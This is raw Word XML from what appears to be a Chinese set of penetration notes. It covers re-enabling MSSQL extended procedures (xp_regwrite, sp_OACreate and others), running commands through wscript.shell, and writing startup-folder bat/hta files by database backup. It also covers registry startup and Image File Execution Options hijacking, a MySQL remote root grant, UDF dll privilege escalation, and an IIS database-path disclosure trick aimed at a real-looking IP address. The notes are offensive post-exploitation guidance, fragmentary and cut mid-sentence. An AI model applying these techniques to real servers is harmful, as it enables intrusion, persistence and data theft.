        <w:br/>
        <w:t>exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_addextendedproc sp_OACreate,'odsole70.dll'    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_addextendedproc sp_OADestroy,'odsole70.dll'    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_addextendedproc sp_OAMethod,'odsole70.dll'    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_addextendedproc sp_OAStop,'odsole70.dll'    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_addextendedproc xp_regread,'xpstar.dll'    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_addextendedproc xp_regwrite,'xpstar.dll'    </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5201">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_addextendedproc xp_availablemedia,'xpstar.dll'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="008C0F6B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="008C0F6B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sp_OACreate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sp_OAMethod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关语句</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0F6B" w:rsidRPr="00C27C62" w:rsidRDefault="008C0F6B" w:rsidP="008C0F6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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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>wscript.shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>来执行命令，先用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p_OACreate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wscript.shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并赋值变量，再由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sp_OAMethod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用执行。相关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句见黑客渗透笔记</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidR="00C23F41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>《</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1.2.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C27C62">
        <w:t>sp_OACreate</w:t>
      </w:r>
      <w:r w:rsidRPr="00C27C62">
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00C27C62">
        <w:lastRenderedPageBreak/>
        <w:t>sp_OAMethod</w:t>
      </w:r>
      <w:r w:rsidRPr="00C27C62">
        <w:t>是扩展的存储过程</w:t>
      </w:r>
      <w:r w:rsidR="00C23F41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0F6B" w:rsidRPr="002A00F7" w:rsidRDefault="008C0F6B" w:rsidP="008C0F6B"/>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="008C0F6B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当你得到用户权限为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，在以上方法都失败的时候，可以试试备份</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件到启动目录。就是先建一个表，写入命令，然后备份数据库到启动目录。具体参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>45</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页文章命令。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="008C0F6B"/>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="008C0F6B">
      <w:r w:rsidRPr="00D13081">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>操作注册表只需</w:t>
      </w:r>
      <w:r w:rsidRPr="00D13081">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>db_owner</w:t>
      </w:r>
      <w:r w:rsidRPr="00D13081">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>权限，但写注册表需要</w:t>
      </w:r>
      <w:r w:rsidRPr="00D13081">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sa</w:t>
      </w:r>
      <w:r w:rsidRPr="00D13081">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>权限。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用方法：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是利用注册表启动项，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是利用映像劫持（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Image File Execution Option</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。具体参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>46</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页文章命令。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="008C0F6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B6553" w:rsidRDefault="000B6553" w:rsidP="008C0F6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B6553" w:rsidRDefault="000B6553" w:rsidP="008C0F6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B6553" w:rsidRDefault="000B6553" w:rsidP="008C0F6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B6553" w:rsidRDefault="000B6553" w:rsidP="008C0F6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B6553" w:rsidRDefault="000B6553" w:rsidP="008C0F6B"/>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008A28DA" w:rsidP="00F50F7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MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="008C0F6B"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 xml:space="preserve">h 127.0.0.1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 xml:space="preserve">p </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="008C0F6B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">grant select,update,insert,delete on *.* to root@192.168.1.203 identified by </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="008C0F6B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注释：其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为要开放的用户，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>192.168.1.203</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为允许连接的机器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test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户的密码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="008C0F6B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现行的提权方法是基于向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出文件，文件有两种：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">mix.dll </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> udf.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C0F6B" w:rsidRPr="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="008C0F6B" w:rsidRDefault="008C0F6B" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="004617DC" w:rsidRDefault="004617D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3EA5" w:rsidRDefault="0023663F" w:rsidP="00A43EA5">
      <w:pPr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc468296473"/>
      <w:r w:rsidRPr="00883EFD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>暴库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00A43EA5" w:rsidRDefault="00A43EA5" w:rsidP="00A43EA5">
      <w:r w:rsidRPr="001841D0">
        <w:t>http://219.237.81.46/yddown/view.asp?id=3 </w:t>
      </w:r>
      <w:r w:rsidRPr="001841D0">
        <w:br/>
        <w:t>http://219.237.81.46/yddown\view.asp?id=3 </w:t>
      </w:r>
      <w:r w:rsidRPr="001841D0">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001841D0">
        <w:t>二者的访问结果是一样的。</w:t>
      </w:r>
      <w:r w:rsidRPr="001841D0">
        <w:t>IE</w:t>
      </w:r>
      <w:r w:rsidRPr="001841D0">
        <w:t>会自动把</w:t>
      </w:r>
      <w:r w:rsidRPr="001841D0">
        <w:t>“\”</w:t>
      </w:r>
      <w:r w:rsidRPr="001841D0">
        <w:t>转变成</w:t>
      </w:r>
      <w:r w:rsidRPr="001841D0">
        <w:t>“/”</w:t>
      </w:r>
      <w:r w:rsidRPr="001841D0">
        <w:t>，从而访问到同一地址。但是，当我们把</w:t>
      </w:r>
      <w:r w:rsidRPr="001841D0">
        <w:t>“/”</w:t>
      </w:r>
      <w:r w:rsidRPr="001841D0">
        <w:t>换成十六进制写法</w:t>
      </w:r>
      <w:r w:rsidRPr="001841D0">
        <w:t>“\”</w:t>
      </w:r>
      <w:r w:rsidRPr="001841D0">
        <w:t>时，</w:t>
      </w:r>
      <w:r w:rsidRPr="001841D0">
        <w:t>IE</w:t>
      </w:r>
      <w:r w:rsidRPr="001841D0">
        <w:t>不会对此进行转换。地址中的</w:t>
      </w:r>
      <w:r w:rsidRPr="001841D0">
        <w:t>“\”</w:t>
      </w:r>
      <w:r w:rsidRPr="001841D0">
        <w:t>被原样提交了，抓包结果如下：</w:t>
      </w:r>
      <w:r w:rsidRPr="001841D0">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001841D0">
        <w:br/>
        <w:t>GET /yddown\view.asp?id=3 HTTP/1.1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A43EA5" w:rsidRDefault="00A43EA5" w:rsidP="00A43EA5">
      <w:r w:rsidRPr="00AA49FB">
        <w:t>当</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA49FB">
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA49FB">
        <w:t>收到并做出解析时，又会将</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA49FB">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA49FB">
        <w:t>还原成</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA49FB">
        <w:t>“\”</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA49FB">
        <w:t>。这样，</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA49FB">
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA49FB">
        <w:t>中网址的相对路径就变成</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA49FB">
        <w:t>/yddown\view.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA49FB">
        <w:t>，这一点很重要，问题正是从这里开始的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA49FB">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C14843" w:rsidRDefault="00A43EA5" w:rsidP="00A43EA5">
      <w:r w:rsidRPr="00300B49">
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>ASP</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>网页中，凡调用数据库时，都会用到一个连接数据库的网页</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>Conn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>，它会创建一个数据库连接对象，定义要调用的数据库路径，一个典型的</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>Conn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>如下：</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:br/>
        <w:t>&lt;% </w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:br/>
        <w:t>dim conn </w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:br/>
        <w:t>dim dbpath </w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:br/>
        <w:t>set conn=server.createobject("adodb.connection") </w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:br/>
        <w:t>DBPath = Server.MapPath("admin/rds_dbd32rfd213fg.mdb") </w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:br/>
        <w:t>conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" &amp; DBPath </w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:br/>
        <w:t>%&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>大家注意第４句：</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>“DBPath = Server.MapPath("admin/rds_dbd32rfd213fg.mdb")”</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>Server.MapPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>方法的作用是将网站中的相对路径转变成物理上的绝对路径，为何要这样？</w:t>
      </w:r>
      <w:r w:rsidRPr="00C33932">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>因为连接数据库时，须指明它的绝对路径才能读取和写入。</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>那什么是相对路径、绝对路径？</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>为了不让访问者知道真实的实际路径，并且确保网站不因变换地址而影响使用，它采用了一种相对路径来表示目录与文件之间的关系。也就是网址目录只表示从根目录起的相对位置。比如网站：</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>http://219.237.81.46</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>的根目录为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>“D:\111\”</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>，雨点下载目录则在根目录（</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>D:\111</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>）内的</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>“yddown”</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>下，我们网站访问该站时，就是在访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>D:\111\yddown\</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>目录，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>http://219.237.81.46/yddown/admin/</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>只表明了</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>Admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>Yddown</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>这个目录的相对关系，把这个网站放在</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>盘，也一样不改变</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>Admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>位于</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>Yddown</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>目录下的关系。</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>当</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>Server.MapPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>方法将相对路径转为真实路径时，它实际是三部分路径加在一起得到真实路径的：网页目前执行时所在的相对路径，也就是从网站物理根目录起的相对路径，比如上面例子中</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>Conn.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>处在从根目录起的</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>“/yddown/”</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>下；然后调用的数据库的相对路径是</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>admin/rds_dbd32rfd213fg.mdb</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>，这样就得到从根目录起的完整相对路径：</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>“/yddown/admin/rds_dbd32rfd213fg.mdb”</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>。这些都只是相对的路径，如何变为真实路径呢？</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t xml:space="preserve">　　设置过</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>的人都会知道，每一个网站，都必须指定它在硬盘上的物理目录，比如上例中，网站根目录所在的物理目录为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>“D:\111”</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>Server.MapPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>方法正是通过把</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>网站根目录的物理地址＋完整的相对路径</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>，从而得到真实的物理路径，数据库在硬盘上的物理路径是：</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>D:\111\yddown\admin\rds_dbd32rfd213fg.mdb</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>以</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>“\”</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>表示真实路径的目录关系，而以</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
        <w:t>“/”</w:t>
      </w:r>
      <w:r w:rsidRPr="00300B49">
